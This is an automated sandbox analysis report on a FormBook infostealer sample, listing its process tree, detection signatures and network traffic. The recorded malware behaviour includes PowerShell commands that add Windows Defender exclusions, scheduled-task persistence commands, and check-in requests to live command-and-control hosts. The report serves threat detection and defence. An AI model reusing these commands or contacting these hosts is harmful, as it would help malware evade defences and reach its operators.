Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CFV20240600121.exe

Overview

General Information

Sample name:CFV20240600121.exe
Analysis ID:1454436
MD5:8874212365ef57aeee15045f9ec684eb
SHA1:f509011e519095509f0368dc9289bdc6a48ebe96
SHA256:ad27785339182485262a3a4b39d554d00aa73cb1ca437a28b181df2901036404
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • CFV20240600121.exe (PID: 5640 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • powershell.exe (PID: 6500 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6752 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6096 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1288 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • CFV20240600121.exe (PID: 4292 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 2556 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 7056 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
    • CFV20240600121.exe (PID: 3664 cmdline: "C:\Users\user\Desktop\CFV20240600121.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
      • RLaIKKYKtFdTMrMFejOcvZaAxPi.exe (PID: 6164 cmdline: "C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • write.exe (PID: 7540 cmdline: "C:\Windows\SysWOW64\write.exe" MD5: 3D6FDBA2878656FA9ECB81F6ECE45703)
          • RLaIKKYKtFdTMrMFejOcvZaAxPi.exe (PID: 2608 cmdline: "C:\Program Files (x86)\KPlcapiOrpuwNxawUeHxBymACKMrfoOvZxUCvZHioLsbnU\RLaIKKYKtFdTMrMFejOcvZaAxPi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7812 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • BPSHhDGmARC.exe (PID: 1288 cmdline: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe MD5: 8874212365EF57AEEE15045F9EC684EB)
      • schtasks.exe (PID: 7296 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • BPSHhDGmARC.exe (PID: 7356 cmdline: "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
      • BPSHhDGmARC.exe (PID: 7368 cmdline: "C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe" MD5: 8874212365EF57AEEE15045F9EC684EB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x328ca:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1c109:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        12.2.CFV20240600121.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          12.2.CFV20240600121.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2dad3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x17312:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          12.2.CFV20240600121.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            12.2.CFV20240600121.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2ccd3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x16512:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", ProcessId: 6500, ProcessName: powershell.exe
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", ProcessId: 6500, ProcessName: powershell.exe
            Sigma detected: Suspicious Add Scheduled Task Parent
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, ParentImage: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exe, ParentProcessId: 1288, ParentProcessName: BPSHhDGmARC.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmp25A3.tmp", ProcessId: 7296, ProcessName: schtasks.exe
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", ProcessId: 1288, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CFV20240600121.exe", ProcessId: 6500, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Scheduled temp file as task from temp location
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\CFV20240600121.exe", ParentImage: C:\Users\user\Desktop\CFV20240600121.exe, ParentProcessId: 5640, ParentProcessName: CFV20240600121.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BPSHhDGmARC" /XML "C:\Users\user\AppData\Local\Temp\tmpA2C.tmp", ProcessId: 1288, ProcessName: schtasks.exe

            Snort Signatures

            Timestamp:06/10/24-10:21:25.134241
            SID:2855465
            Source Port:51374
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:21:39.107622
            SID:2855465
            Source Port:51378
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:24:15.334767
            SID:2855465
            Source Port:51422
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:20:47.394016
            SID:2855465
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:23:47.463476
            SID:2855465
            Source Port:51414
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:23:33.648907
            SID:2855465
            Source Port:51410
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:21:11.241457
            SID:2855465
            Source Port:51370
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:21:52.948385
            SID:2855465
            Source Port:51382
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:22:07.327341
            SID:2855465
            Source Port:51386
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:23:19.260037
            SID:2855465
            Source Port:51406
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:22:21.730111
            SID:2855465
            Source Port:51390
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:22:36.059394
            SID:2855465
            Source Port:51394
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:24:01.195678
            SID:2855465
            Source Port:51418
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:22:51.257192
            SID:2855465
            Source Port:51398
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:06/10/24-10:23:05.760710
            SID:2855465
            Source Port:51402
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://zijrmf.com/registerAvira URL Cloud: Label: malware
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted file
            Source: CFV20240600121.exeReversingLabs: Detection: 28%
            Source: CFV20240600121.exeVirustotal: Detection: 41%Perma Link
            Yara detected FormBook
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.CFV20240600121.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2381559127.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000016.00000002.4526253929.0000000004F00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524586761.0000000004B10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4523325775.0000000002B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.4524320842.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2382085207.0000000000EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.4524520793.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.2383930923.00000000018F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: CFV20240600121.exeJoe Sandbox ML: detected
            Source: CFV20240600121.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: CFV20240600121.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: write.pdbGCTL source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: write.pdb source: CFV20240600121.exe, 0000000C.00000002.2382231530.0000000000F48000.00000004.00000020.00020000.00000000.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000002.4523941822.0000000000A9E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000014.00000000.2308515930.000000000087E000.00000002.00000001.01000000.0000000D.sdmp, RLaIKKYKtFdTMrMFejOcvZaAxPi.exe, 00000016.00000000.2451569346.000000000087E000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: CFV20240600121.exe, CFV20240600121.exe, 0000000C.00000002.2382461967.00000000013A0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004DA0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000015.00000003.2383703253.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000003.2381838402.0000000004A49000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000015.00000002.4524767182.0000000004F3E000.00000040.00001000.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\CFV20240600121.exeCode function: 4x nop then jmp 0A13F71Eh0_2_0A13EF37
            Source: C:\Users\user\AppData\Roaming\BPSHhDGmARC.exeCode function: 4x nop then jmp 0723E986h13_2_0723E19F

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49717 -> 101.36.121.143:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51370 -> 85.13.162.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51374 -> 34.149.87.45:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51378 -> 116.213.43.190:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51382 -> 102.222.124.13:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51386 -> 35.241.34.216:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51390 -> 176.113.70.180:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51394 -> 101.36.121.143:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51398 -> 103.138.88.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51402 -> 162.0.213.72:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51406 -> 217.116.0.191:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51410 -> 103.120.80.111:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51414 -> 64.226.69.42:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51418 -> 3.64.163.50:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:51422 -> 172.67.160.38:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.mg55aa.xyz
            Source: Joe Sandbox ViewIP Address: 3.64.163.50 3.64.163.50
            Source: Joe Sandbox ViewASN Name: CKL1-ASNKE CKL1-ASNKE
            Source: Joe Sandbox ViewASN Name: ACPCA ACPCA
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /9yv1/?kH=00U8ENLHk&TTv82Lg=JDOq8sdeR7GiqYjlH1+Kl93ySCj4A7pMbAnb3QvwXz09Z+TZO8TEz9zOGDteEA1FR7OBJaMhM3F8CenkIFufyI1/tJZv1FUS2g72fmKkU9bvVaC3pZ4GqQYdgiVFYuGLpQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.am1-728585.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /jd4u/?TTv82Lg=vZ8PZlFPVnVyyN885vZALLUChV9dHrd3y3rRI9QumGWurBO6VP20aAnkH/ZZbF4T7IQeomZ4+ZpTiLO44xxEwk6LrLidp4nJrApztAjEtY9oMR30BoZ74UoGsezUDnZKUQ==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.witoharmuth.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fkxp/?kH=00U8ENLHk&TTv82Lg=/8gewv/74QCfxJQQ58xYAEc5kagwqNCJuIN4rKAFuTxSJYlJlDskfHfL2d0FIn6Xu6R3bNDF3eABBlle0YrSl8ue4/yxd3ZPX0927FL0RhLHrtbCP+IL33YO17qClSrWnQ== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.magnoliahairandco.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /a472/?TTv82Lg=jmdR8js2K745w9duG20fYqFnwU+bCGk1cWKHz342ws1XHieKZe3C99dpKKnD83tJkcayHzCeZ9pypijZiF65Efqxzc0IleT34n8kjQ1m2nEIGr+ujgw0M5ErIDQmrZA0lA==&kH=00U8ENLHk HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.binpvae.lolConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /6tsi/?kH=00U8ENLHk&TTv82Lg=32QAWULDWbDdguRmN+n7KAedzhLgUj/fuxT1ixo+bo/DV3lzYlgJ31gF+BLIDbJLYEln7zqyZcMgz5dBJXmOK4lY1iymAphF3EHD932tCXiTVvhf3y+Qx+z1RxDrWIu9Tw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Host: www.duzane.comConnection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
